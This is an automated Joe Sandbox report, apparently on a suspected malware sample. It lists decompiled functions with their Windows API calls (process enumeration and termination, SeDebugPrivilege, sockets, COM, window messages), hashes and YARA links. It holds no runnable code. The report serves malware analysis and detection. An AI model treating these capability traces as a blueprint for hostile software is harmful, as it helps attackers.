                                                                                                                      • Instruction ID: 09d477c07df3ab1b00db1db336ce60fb0e71c42c744aaa60637afd6e0ff2a0d4
                                                                                                                      • Opcode Fuzzy Hash: 93da68b19f1f06f540b556daca975cd1d40fc4979edd2a54b9d69163be862315
                                                                                                                      • Instruction Fuzzy Hash: 0FC186B1A0021A9FDF10DF98D885BEEBBF9FF48314F148469E905A7281E7B09D45DB90
                                                                                                                      Function 0053975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0051710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?,?,?,00517455), ref: 00517127
                                                                                                                        • Part of subcall function 0051710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?,?), ref: 00517142
                                                                                                                        • Part of subcall function 0051710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?,?), ref: 00517150
                                                                                                                        • Part of subcall function 0051710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?), ref: 00517160
                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00539806
                                                                                                                      • _memset.LIBCMT ref: 00539813
                                                                                                                      • _memset.LIBCMT ref: 00539956
                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00539982
                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 0053998D
                                                                                                                      Strings
                                                                                                                      • NULL Pointer assignment, xrefs: 005399DB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                      • API String ID: 1300414916-2785691316
                                                                                                                      • Opcode ID: f723ff34ed361134490092fa663dd89f211fba3970ef6193cef83c809de8f2e4
                                                                                                                      • Instruction ID: 0dd32e4d9a2341c77490a0ccba7f9e6083d14ebf224a9a9d5fd3efd3f26f7281
                                                                                                                      • Opcode Fuzzy Hash: f723ff34ed361134490092fa663dd89f211fba3970ef6193cef83c809de8f2e4
                                                                                                                      • Instruction Fuzzy Hash: 059139B1D00229EBDB10DFA5DC84EDEBBB9BF49314F10415AF519A7281DB71AA44CFA0
                                                                                                                      Function 00546D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00546E24
                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00546E38
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00546E52
                                                                                                                      • _wcscat.LIBCMT ref: 00546EAD
                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00546EC4
                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00546EF2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window_wcscat
                                                                                                                      • String ID: SysListView32
                                                                                                                      • API String ID: 307300125-78025650
                                                                                                                      • Opcode ID: d42411bc32c6d427d6ce075f46a9d1f94a2657cd91fb5b61350f88cde971d6ad
                                                                                                                      • Instruction ID: 913f3c09fa53b3e8c4aff71c32973e3c728f9918eb2a766c0a1f43c44976653a
                                                                                                                      • Opcode Fuzzy Hash: d42411bc32c6d427d6ce075f46a9d1f94a2657cd91fb5b61350f88cde971d6ad
                                                                                                                      • Instruction Fuzzy Hash: 2D419074A00349AFEF219F64CC85BEABBF8FF09358F10442AF584E7291D6719D848B60
                                                                                                                      Function 0053E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00523C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00523C7A
                                                                                                                        • Part of subcall function 00523C55: Process32FirstW.KERNEL32(00000000,?), ref: 00523C88
                                                                                                                        • Part of subcall function 00523C55: CloseHandle.KERNEL32(00000000), ref: 00523D52
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0053E9A4
                                                                                                                      • GetLastError.KERNEL32 ref: 0053E9B7
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0053E9E6
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0053EA63
                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 0053EA6E
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0053EAA3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                      • Opcode ID: e96732cb0ca1bbd1a10288b73db67e5eaa0585491de497a78b782531ad8f9b0b
                                                                                                                      • Instruction ID: 90e35dd1a24b8912460b59cdf5d883d886746233193ef75044a1a985bf7de29b
                                                                                                                      • Opcode Fuzzy Hash: e96732cb0ca1bbd1a10288b73db67e5eaa0585491de497a78b782531ad8f9b0b
                                                                                                                      • Instruction Fuzzy Hash: 6A418A31200201AFDB14EF14C89AFAEBBE5BF81318F04841DF9069B2D2CB75AC48DB95
                                                                                                                      Function 00522F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00523033
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoad
                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                      • Opcode ID: 19ae3ebb1fcdcfac2bd3739c2420727f4c31742d3ef5d34709e16faea356758b
                                                                                                                      • Instruction ID: ba6702cad94df0c12fbd69fa954eb07b55556c7730bf1cca28b792dbe294d564
                                                                                                                      • Opcode Fuzzy Hash: 19ae3ebb1fcdcfac2bd3739c2420727f4c31742d3ef5d34709e16faea356758b
                                                                                                                      • Instruction Fuzzy Hash: FE110B353483A6BEE7149A19FC4AC6B7F9CBF16324F10402AF904561C1DAA95F4056B4
                                                                                                                      Function 005242F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00524312
                                                                                                                      • LoadStringW.USER32(00000000), ref: 00524319
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0052432F
                                                                                                                      • LoadStringW.USER32(00000000), ref: 00524336
                                                                                                                      • _wprintf.LIBCMT ref: 0052435C
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0052437A
                                                                                                                      Strings
                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00524357
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                      • API String ID: 3648134473-3128320259
                                                                                                                      • Opcode ID: 272b6ed80d9e65296671a3853113cfb3938e68ccfed63418f902f157e5660953
                                                                                                                      • Instruction ID: 31a86ed343d8ffd8271afffc503a5290edd2427a7b0a876b90d8c11277899d48
                                                                                                                      • Opcode Fuzzy Hash: 272b6ed80d9e65296671a3853113cfb3938e68ccfed63418f902f157e5660953
                                                                                                                      • Instruction Fuzzy Hash: 33018FF6900218BFE711DBA4DD8DEE7776CEB19305F0005A1BB09E2051EA349E889B74
                                                                                                                      Function 0054D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0054D47C
                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0054D49C
                                                                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0054D6D7
                                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0054D6F5
                                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0054D716
                                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 0054D735
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0054D75A
                                                                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 0054D77D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1211466189-0
                                                                                                                      • Opcode ID: 8279a556694c6b3d7720f2c5015482f875602e8bf0ce9a4c9c24e1327ef4a5c2
                                                                                                                      • Instruction ID: 69a3d44a76923e6087b06016a413e941467b29ee91ce1214e86559226a18d87d
                                                                                                                      • Opcode Fuzzy Hash: 8279a556694c6b3d7720f2c5015482f875602e8bf0ce9a4c9c24e1327ef4a5c2
                                                                                                                      • Instruction Fuzzy Hash: 08B1B935600229EFDF14CF68C985BED7BB1FF04718F098069EC48AB295DB34A950DBA0
                                                                                                                      Function 004C2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,004FC1C7,00000004,00000000,00000000,00000000), ref: 004C2ACF
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,004FC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 004C2B17
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,004FC1C7,00000004,00000000,00000000,00000000), ref: 004FC21A
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,004FC1C7,00000004,00000000,00000000,00000000), ref: 004FC286
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ShowWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1268545403-0
                                                                                                                      • Opcode ID: fe91726af5046c1e4792dcdb0b6ff8edefa3915c838cd65b73a6af1d0475e596
                                                                                                                      • Instruction ID: aad58180530943f11dfbeca8313a9e9fcfee798fdf17e14cb5f378766901fced
                                                                                                                      • Opcode Fuzzy Hash: fe91726af5046c1e4792dcdb0b6ff8edefa3915c838cd65b73a6af1d0475e596
                                                                                                                      • Instruction Fuzzy Hash: 33412D386046849ACBF59B288FC8F7B7B91FB95304F15881FE14742760C6FEA846D719
                                                                                                                      Function 005270C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 005270DD
                                                                                                                        • Part of subcall function 004E0DB6: std::exception::exception.LIBCMT ref: 004E0DEC
                                                                                                                        • Part of subcall function 004E0DB6: __CxxThrowException@8.LIBCMT ref: 004E0E01
                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00527114
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00527130
                                                                                                                      • _memmove.LIBCMT ref: 0052717E
                                                                                                                      • _memmove.LIBCMT ref: 0052719B
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 005271AA
                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 005271BF
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 005271DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 256516436-0
                                                                                                                      • Opcode ID: 2f44c6a66457ee47f2fcbebdaf1dff40ce88baca9f7065584b2dc210b6a76458
                                                                                                                      • Instruction ID: e0f285dc3b22ae1754ba305f7b504394ba9ee24b5fb39cdd68943019f85bc7ef
                                                                                                                      • Opcode Fuzzy Hash: 2f44c6a66457ee47f2fcbebdaf1dff40ce88baca9f7065584b2dc210b6a76458
                                                                                                                      • Instruction Fuzzy Hash: 8A318035900205EBCB00DFA9DC859AB7B78FF45314F1440BAF9049B246D7749E54DB64
                                                                                                                      Function 005461D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 005461EB
                                                                                                                      • GetDC.USER32(00000000), ref: 005461F3
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005461FE
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0054620A
                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00546246
                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00546257
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0054902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00546291
                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 005462B1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3864802216-0
                                                                                                                      • Opcode ID: 0ea84417c485af204bdad0c35ca0508f643eec7fc010756bb5d4e23a310d41e6
                                                                                                                      • Instruction ID: a636d1078f76a328a37d26072caff0cec38471f45d1ec673b12a26bd53f9c23c
                                                                                                                      • Opcode Fuzzy Hash: 0ea84417c485af204bdad0c35ca0508f643eec7fc010756bb5d4e23a310d41e6
                                                                                                                      • Instruction Fuzzy Hash: EE319F7A201210BFEB108F14CC8AFEB3FA9FF5A769F050065FE089A191C6B59C45CB60
                                                                                                                      Function 0051BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2931989736-0
                                                                                                                      • Opcode ID: 4bae76e11e3bbc13b642c9c6e7721353993cdb115efeb519294ca3010f9a41e8
                                                                                                                      • Instruction ID: 22bb2167e76952044c8f91f2fa8a8af2e6e44f2f55c31514d629f09677928d2c
                                                                                                                      • Opcode Fuzzy Hash: 4bae76e11e3bbc13b642c9c6e7721353993cdb115efeb519294ca3010f9a41e8
                                                                                                                      • Instruction Fuzzy Hash: AB21017224520A7BF20467129D92FFB7F5CBF1138DF08402AFD0496A83EB28DE5582E5
                                                                                                                      Function 0052EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
                                                                                                                        • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
                                                                                                                        • Part of subcall function 004DFC86: _wcscpy.LIBCMT ref: 004DFCA9
                                                                                                                      • _wcstok.LIBCMT ref: 0052EC94
                                                                                                                      • _wcscpy.LIBCMT ref: 0052ED23
                                                                                                                      • _memset.LIBCMT ref: 0052ED56
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 774024439-3081909835
                                                                                                                      • Opcode ID: 0a1741a1d9234cdeb8fa11a7fd67aedbce6b952eddda6bb4553ffaed922dde52
                                                                                                                      • Instruction ID: 958026406d9677320a252041789ff3193576fc848eb6e588ea5b19984a417fb1
                                                                                                                      • Opcode Fuzzy Hash: 0a1741a1d9234cdeb8fa11a7fd67aedbce6b952eddda6bb4553ffaed922dde52
                                                                                                                      • Instruction Fuzzy Hash: 48C1C0745083519FC754EF25D886E6ABBE4FF85314F00482EF8999B2A2DB34EC45CB86
                                                                                                                      Function 00536B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00536C00
                                                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00536C21
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00536C34
                                                                                                                      • htons.WSOCK32(?), ref: 00536CEA
                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 00536CA7
                                                                                                                        • Part of subcall function 0051A7E9: _strlen.LIBCMT ref: 0051A7F3
                                                                                                                        • Part of subcall function 0051A7E9: _memmove.LIBCMT ref: 0051A815
                                                                                                                      • _strlen.LIBCMT ref: 00536D44
                                                                                                                      • _memmove.LIBCMT ref: 00536DAD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3619996494-0
                                                                                                                      • Opcode ID: 6ec5e633468656b6416caab08380f916016975a58051701335efb082c5775c7f
                                                                                                                      • Instruction ID: 7fbb157e9b2e61d41c1c7460c5ed4e8683da7273b11c74ac0b0c8b796a8e3ac0
                                                                                                                      • Opcode Fuzzy Hash: 6ec5e633468656b6416caab08380f916016975a58051701335efb082c5775c7f
                                                                                                                      • Instruction Fuzzy Hash: C681F075204200BBC750EF25CC96FABBBA8BF84718F10891EF5569B292DA74ED04CB55
                                                                                                                      Function 004C1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
